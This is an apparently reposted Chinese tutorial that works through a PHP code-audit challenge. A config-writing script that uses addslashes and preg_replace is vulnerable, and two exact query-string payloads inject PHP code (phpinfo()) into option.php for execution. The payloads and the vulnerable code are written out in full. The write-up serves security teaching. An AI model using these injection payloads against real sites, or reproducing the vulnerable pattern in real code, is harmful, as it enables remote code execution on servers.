温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

PHP代码审计的示例分析

发布时间:2021-11-12 11:12:37 来源:亿速云 阅读:156 作者:小新 栏目:网络管理

这篇文章主要介绍了 PHP代码审计的示例分析,具有一定借鉴价值,感兴趣的朋友可以参考下,希望大家阅读完这篇文章之后大有收获,下面让小编带着大家一起了解一下。

Challenge

index.php

<?php
$str = addslashes($_GET['option']);
$file = file_get_contents('xxxxx/option.php');
$file = preg_replace('|\$option=\'.*\';|', "\$option='$str';", $file);
file_put_contents('xxxxx/option.php', $file);

xxxxx/option.php

$option='test';

Solution

流程如下:

  1. 对传入的option参数进行addslashes,比如有单引号',会变成\'

  2. 通过正则匹配xxxxx/option.php中的$option='xxx';,将xxx的内容替换为经第一步处理的值

  3. 替换完成,将其写入xxxxx/option.php。

场景: 用于写入配置文件等。

法一

先访问:

?option=aaa';%0aphpinfo();//

经过addslashes后,$str值为 aaa\';%0aphpinfo();//

进行正则匹配并写入文件,xxxxx/option.php的内容变为:

<?php
$option='aaa\';
phpinfo();//';
?>

再访问:

?option=xxx

正则匹配时,会将两个单引号里的内容即 aaa\ ,替换为 xxx,此时xxxxx/option.php的内容变为

<?php
$option='xxx';
phpinfo();//';
?>

最后访问:/xxxxx/option.php

法二

访问:

?option=aaa\';phpinfo();//

经过addslashes后,$str为 aaa\\\';phpinfo();//

经过preg_replace正则匹配后,对\做了转义处理,xxxxx/option.php的内容变为:

<?php
$option='aaa\\';phpinfo();//';
?>

最后访问:/xxxxx/option.php

感谢你能够认真阅读完这篇文章,希望小编分享的“ PHP代码审计的示例分析”这篇文章对大家有帮助,同时也希望大家多多支持亿速云,关注亿速云行业资讯频道,更多相关知识等着你来学习!

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

php
AI